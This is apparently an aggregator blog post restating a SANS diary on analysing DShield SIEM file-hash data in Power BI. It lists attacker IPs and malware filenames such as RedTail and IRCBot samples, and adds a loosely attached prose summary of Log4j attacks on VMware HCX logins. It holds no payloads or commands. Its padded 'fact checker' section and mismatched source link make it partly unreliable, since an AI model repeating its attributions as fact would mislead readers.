Analyzing File Hashes with Power BI from DShield SIEM Data

By /

Listen to this Post

File hash analysis plays a crucial role in cybersecurity investigations, helping to identify malicious activity, track file modifications, and detect anomalies. This article explores how Power BI can be leveraged to analyze file hash data exported from the DShield SIEM system. By running queries in Elastic Discover, exporting relevant data, and visualizing trends in Power BI, we can uncover valuable insights into suspicious file activity and IP behavior over a 60-day period.

File Hash Analysis with Power BI

The author begins by querying Elastic Discover to retrieve file-related data from the past 60 days using the query:

“`file.name : “`

The extracted data is then exported in CSV format and imported into Power BI for visualization.

Steps to Analyze Data in Power BI:

1. Data Extraction from Elastic Discover:

  • Run a query to collect relevant file information.

– Export the results as a CSV file.

2. Importing Data into Power BI:

  • Open Power BI and select the CSV file.
  • Configure timestamps by splitting the date and time fields.

– Remove duplicate timestamps to refine the dataset.

3. Building Visualizations:

  • Analyze IP activity, file names, and hash frequency.
  • Identify patterns in file uploads and changes over time.

Key Observations from the Data

– IP Activity Analysis:

  • The most active IP in the dataset, 87.120.113[.]231, showed consistent activity during January and early February 2025.
  • It was associated with six different files linked to RedTail malware, with most filenames having multiple hashes.

– Filename Correlation:

  • A suspicious filename, eyshcjdmzg, was identified, matching a previously documented Linux Trojan in April 2024.
  • The IP addresses related to this filename had changed but still belonged to the same subnet (218.92.0[.]60 → 218.92.0[.]131 & 218.92.0[.]132).

– Strange Filename Uploads:

  • Filename rktgw4Ir appeared on January 20, 2025, uploaded by IP 87.154.189[.]196.
  • Another unusual filename, P7TjdNkM, was uploaded on January 31, 2025, by IP 79.7.197[.]84.
  • Checking these files against VirusTotal revealed that one of them was an IRCBot, a common malware used for remote control and communication.

Conclusion

By exporting large datasets and using Power BI to visualize trends, analysts can detect patterns that might otherwise go unnoticed. The ability to track file hash changes, correlate IP activity, and identify strange filenames enables more effective security monitoring and retrospective analysis.

What Undercode Say:

1. Why Power BI for Cybersecurity Analysis?

Power BI is primarily a business intelligence tool, but its ability to visualize and manipulate large datasets makes it valuable for cybersecurity investigations. Unlike traditional SIEM dashboards, Power BI allows analysts to:
– Build custom dashboards tailored to specific threat-hunting needs.
– Perform time-series analysis to track trends over extended periods.
– Correlate multiple data sources, making it easier to detect anomalies.

2. The Significance of File Hash Analysis

File hash tracking is essential for identifying malware variants and tracking modifications. This article highlights the importance of analyzing hashes alongside timestamps and IP sources to uncover relationships between file uploads and malicious activity.

  • Multiple Hashes per Filename: Malicious actors frequently modify file contents while keeping filenames consistent to evade detection.
  • Static Hashes: Files like clean.sh and setup.sh remained unchanged, suggesting they might be benign system files or intentionally left unmodified by attackers.

3. Identifying Anomalous IP Behavior

The dataset reveals how specific IPs repeatedly interact with suspicious files. This information is critical in threat intelligence because:
– Frequent IP activity may indicate automated attacks (e.g., botnets).
– Changes in IPs but within the same subnet suggest persistent threats using dynamic addressing.

4. Retrospective Analysis and Its Benefits

By exporting SIEM data and analyzing it outside its original environment, analysts can:
– Discover overlooked threats that were missed in real-time alerts.
– Correlate with external threat intelligence sources like VirusTotal.
– Identify behavioral patterns that could indicate an advanced persistent threat (APT).

5. The Log4j Exploit Findings

The second part of the article discusses increased scanning activity for the VMware Hybrid Cloud Extension (HCX) API. Attackers attempted brute-force attacks on authentication endpoints, but further investigation revealed they were actually exploiting the Log4j vulnerability by injecting malicious payloads into the username field.

– Observed attack techniques:

  • Exploitation of Log4j vulnerability via manipulated authentication requests.
  • Use of randomized user agents to avoid signature-based detection.
  • Targeting login endpoints for potential credential theft and session hijacking.

– Key Takeaways:

  • The threat actor (IP 107.173.125.163) focused on login pages, suggesting credential theft or reconnaissance before launching further attacks.
  • The attack methodology aligns with previously observed Log4j exploitation tactics used to gain initial footholds in vulnerable systems.

Final Thoughts on Power BI in Cybersecurity

Power BI is not a replacement for SIEM tools, but it can complement them by providing deeper insights through advanced visualizations and retrospective analysis. By continuously monitoring file hashes, tracking suspicious IP activity, and correlating multiple data points, security teams can enhance their ability to detect and mitigate threats effectively.

Fact Checker Results:

  1. File Hash Analysis Enhances Threat Intelligence: Tracking hashes alongside timestamps and IP activity helps identify suspicious file behaviors.
  2. Retrospective Analysis Can Reveal Missed Threats: Exporting data for offline analysis enables deeper investigation into cyber threats.
  3. Log4j Exploitation Continues to Be a Major Threat: Attackers still leverage Log4j vulnerabilities in authentication endpoints to execute remote code.

By using Power BI to analyze SIEM data, security teams can stay ahead of emerging threats and improve their investigative capabilities.

References:

Reported By: https://isc.sans.edu/forums/diary/Microsoft
Extra Source Hub:
https://www.stackexchange.com
Wikipedia
Undercode AI

Image Source:

Pexels
Undercode AI DI v2

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Explore More: